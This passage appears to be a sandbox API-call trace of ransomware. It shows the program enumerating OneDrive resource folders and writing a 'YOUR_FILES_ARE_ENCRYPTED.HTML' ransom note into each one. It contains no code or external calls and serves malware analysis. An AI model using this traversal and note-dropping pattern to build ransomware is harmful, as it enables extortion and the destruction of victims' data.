lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b2a92ce, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3b2a92ce, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3b774971, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x146c0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.969] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.969] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\th\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.969] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.969] lstrlenW (lpString=".mui") returned 4 [0113.969] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.969] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b2a92ce, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3b2a92ce, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3b774971, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x146c0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.969] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0113.969] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\th\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.969] GetProcessHeap () returned 0x600000 [0113.970] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\th\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\th\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.970] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.971] CloseHandle (hObject=0x334) returned 1 [0113.971] GetProcessHeap () returned 0x600000 [0113.971] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.971] GetProcessHeap () returned 0x600000 [0113.971] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.972] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ba1b177, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3ba1b177, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3ba1b177, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ti", cAlternateFileName="")) returned 1 [0113.972] StrStrIW (lpFirst="ti", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.972] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ti") returned 78 [0113.972] GetProcessHeap () returned 0x600000 [0113.972] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.973] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ti" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ti") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ti" [0113.973] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ti", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ti\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ti\\*" [0113.973] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ti\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ba1b177, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3ba1b177, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3c07d3b2, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName=".", cAlternateFileName="")) returned 0x626838 [0113.974] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ba1b177, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3ba1b177, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3c07d3b2, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="..", cAlternateFileName="")) returned 1 [0113.974] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c07d3b2, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3c07d3b2, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3c816989, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x116c0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.974] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.974] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ti\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.974] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.974] lstrlenW (lpString=".mui") returned 4 [0113.974] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.974] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c07d3b2, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3c07d3b2, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3c816989, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x116c0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.974] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0113.974] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ti\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.974] GetProcessHeap () returned 0x600000 [0113.974] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.974] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ti\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\ti\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.975] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.976] CloseHandle (hObject=0x334) returned 1 [0113.976] GetProcessHeap () returned 0x600000 [0113.976] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.976] GetProcessHeap () returned 0x600000 [0113.976] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.976] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ca9f233, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3ca9f233, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3ca9f233, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="tk-tm", cAlternateFileName="")) returned 1 [0113.976] StrStrIW (lpFirst="tk-tm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.976] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tk-tm") returned 81 [0113.976] GetProcessHeap () returned 0x600000 [0113.976] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.976] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tk-tm" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tk-tm") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tk-tm" [0113.976] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tk-tm", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tk-tm\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tk-tm\\*" [0113.976] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tk-tm\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ca9f233, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3ca9f233, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3cd73d9d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.976] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ca9f233, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3ca9f233, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3cd73d9d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="..", cAlternateFileName="")) returned 1 [0113.976] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cd73d9d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3cd73d9d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3dcf3371, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x154c0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.976] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.976] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tk-tm\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.976] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.976] lstrlenW (lpString=".mui") returned 4 [0113.976] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.977] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cd73d9d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3cd73d9d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3dcf3371, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x154c0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.977] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.977] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tk-tm\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.977] GetProcessHeap () returned 0x600000 [0113.977] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.977] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tk-tm\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\tk-tm\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.977] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.978] CloseHandle (hObject=0x334) returned 1 [0113.978] GetProcessHeap () returned 0x600000 [0113.978] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.978] GetProcessHeap () returned 0x600000 [0113.978] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.978] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e99da31, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3e99da31, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3e99da31, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="tn-za", cAlternateFileName="")) returned 1 [0113.978] StrStrIW (lpFirst="tn-za", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.978] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tn-za") returned 81 [0113.979] GetProcessHeap () returned 0x600000 [0113.979] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.979] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tn-za" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tn-za") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tn-za" [0113.979] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tn-za", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tn-za\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tn-za\\*" [0113.979] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tn-za\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e99da31, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3e99da31, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3ee3c3c6, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0113.979] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e99da31, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3e99da31, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3ee3c3c6, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="..", cAlternateFileName="")) returned 1 [0113.979] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ee3c3c6, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3ee3c3c6, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3f32718f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x17cc0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.979] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.979] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tn-za\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.979] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.979] lstrlenW (lpString=".mui") returned 4 [0113.979] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.979] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ee3c3c6, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3ee3c3c6, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3f32718f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x17cc0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.979] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0113.979] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tn-za\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.979] GetProcessHeap () returned 0x600000 [0113.979] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tn-za\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\tn-za\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.980] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.981] CloseHandle (hObject=0x334) returned 1 [0113.981] GetProcessHeap () returned 0x600000 [0113.981] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.981] GetProcessHeap () returned 0x600000 [0113.981] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.981] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3f3bfc7c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3f3bfc7c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3f3bfc7c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="tr", cAlternateFileName="")) returned 1 [0113.981] StrStrIW (lpFirst="tr", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.981] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tr") returned 78 [0113.981] GetProcessHeap () returned 0x600000 [0113.981] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.981] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tr" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tr") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tr" [0113.981] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tr", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tr\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tr\\*" [0113.981] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tr\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3f3bfc7c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3f3bfc7c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3f8f6c52, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.990] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3f3bfc7c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3f3bfc7c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3f8f6c52, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="..", cAlternateFileName="")) returned 1 [0113.990] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: 